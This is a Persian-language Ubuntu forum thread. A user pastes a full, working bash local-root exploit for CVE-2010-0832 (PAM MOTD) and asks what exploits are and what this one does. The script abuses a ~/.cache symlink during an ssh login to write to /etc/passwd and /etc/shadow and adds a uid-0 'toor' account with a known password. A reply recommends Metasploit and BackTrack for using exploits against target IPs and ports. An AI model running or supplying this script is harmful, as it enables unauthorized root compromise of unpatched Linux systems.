انجمن‌های فارسی اوبونتو

لطفاً به انجمن‌ها وارد شده و یا جهت ورود ثبت‌نام نمائید

لطفاً جهت ورود نام کاربری و رمز عبورتان را وارد نمائید


ارائه ۲۴٫۱۰ اوبونتو منتشر شد 🎉

نویسنده موضوع: Exploit  (دفعات بازدید: 1178 بار)

0 کاربر و 1 مهمان درحال مشاهده موضوع.

آفلاین مُحَمَّدْ

  • Full Member
  • *
  • ارسال: 217
  • جنسیت : پسر
Exploit
« : 27 امرداد 1389، 11:23 ب‌ظ »
اینو یکجا دیدم گفتم بذارم چند تا چیز روشن شه ؟
1 - EXPLOIT ها چه چیزی هستن و چیکار میکنن ؟
2 -  این دستورات sh  مال همون شله ؟ و چطور نوشته میشه ؟( وچطور میشه یاد گرفت )
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
#   [*] Ubuntu PAM MOTD local root
#   [*] Backuped /home/user/.ssh/authorized_keys
#   [*] SSH key set up
#   [*] Backuped /home/user/.cache
#   [*] spawn ssh
#   [+] owned: /etc/passwd
#   [*] spawn ssh
#   [+] owned: /etc/shadow
#   [*] Restored /home/user/.cache
#   [*] Restored /home/user/.ssh/authorized_keys
#   [*] SSH key removed
#   [+] Success! Use password toor to get root
#   Password:
#   root@ubuntu:/home/user# id
#   uid=0(root) gid=0(root) groupes=0(root)
#
P='toor:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
    [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
    [ -e "$1" ] || return 0
    mv "$1"{,.bak} || return 1
    echo "[*] Backuped $1"
}
restore() {
    [ -e "$1" ] && rm -rf "$1"
    [ -e "$1".bak ] || return 0
    mv "$1"{.bak,} || return 1
    echo "[*] Restored $1"
}
key_create() {
    backup ~/.ssh/authorized_keys
    ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
    [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
    mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
    echo "[*] SSH key set up"
}
key_remove() {
    rm -f "$KEY"
    restore ~/.ssh/authorized_keys
    echo "[*] SSH key removed"
}
own() {
    [ -e ~/.cache ] && rm -rf ~/.cache
    ln -s "$1" ~/.cache || return 1
    echo "[*] spawn ssh"
    ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
    [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
    echo "[+] owned: $1"
}
bye() {
    key_remove
    exit 1
}
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
  chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor/code]
3 - خود این کد چیکار میکنه  ;D
درسته که درست نیست ولی درست نیست که بگیم درسته.

آفلاین پیام

  • Sr. Member
  • *
  • ارسال: 348
پاسخ به: Exploit
« پاسخ #1 : 28 امرداد 1389، 12:09 ب‌ظ »
اکسپلویت ها یک سری کدهایی نفوذ  هستن که با زبان سی یا پرل یا هر چی می نویسن و به وسیله باگهایی که در سیستم وجود داره از طریق اون اکسپلویت نفوذ می کنند
برای اکسپلویت ها یک سری تنظیمات خاصی میخواد که الان با فریم ورک بی نهایت قدرتمند meta sploit  که الان تحت رابی اجرا می شه استفاده کنید و در اون فریم ورک میتونید اکسپلویت هاتون رو اضافه یا با یه پیلود خاص استفاده کنید  شما می تونید خودتون کد نفوذ رو بنویسید یا از اکسپلویت های اماده ی توی اون فریم ورک استفاده کنید که بهتره همین کارو انجام بدید
کدهایی که به زبان سی یا پرل وجود دارن رو میتونید کامپایل کنید و خروجی اون نسبت به کاری که قراره انجام بده و برنامه نویس توش شکل داده میتونید ازش استفاده کنید  اکسپلویت ها از دقت بالای برنامه نویسی در سطح حرفه ای و همین طور استفاده درست از توابع رو میطلبه که نیاز به تجربه زیادی داره
اگر از دیسک زنده  BackTrack  استفاده کنید که  چند وقتیه که دیسک زنده رو که قابل نصب هم هست به سمت اوبونتو حرکت داده میتونید از یک سری ابزارهای خاص که مخصوص هک کردن هستن استفاده کنید و همین طور فریم ورک متااسپلویت هم به صورت نصب و قابل نصب و اپدیت وجود داره
بسته به کاری که اسپلویت انجام میده  گرفتن شل یا اجازه ریموت  یا پورت باز ایجاد کردن و یا  سر ریز بافر کردن شما میتونید ازش استفاده کنید  اکسپلویت ها دو حالت ریموت و لوکال رو هستن
استفاده از  اکسپلویت  از طریق فریم ورک قبل از  از کامپایل کردن احتیاج به اضافه کردن ای پی هدف و همین طور ست کردن پورت که از طریق رخنه کردن ایجاد میشه که قبلش بهتره چک بشه که اصلا باز هست یا نه و معمولا پورت ها رو بالای ۱۰۲۴ میدن

این که چطور یاد بگیری احتیاج به دانش و تجربه بالایی داره البته هستن کسایی که ادعا میکنن که به این اصول نیاز نیست ولی در واقع این کار یه کار فوق حرفه ایه که از باگهایی که در کدهای نرم افزار و همین طور مشکلات مربوط به امنیت سیستم ها بهره میگیره در این مورد چه لینوکس و چه ویندوز هر دو میتونن اسیب پذیر باشن و میتونی اطلاعات بیشتری رو تو سایت  www.milw0rm.com  ببینی

موفق باشی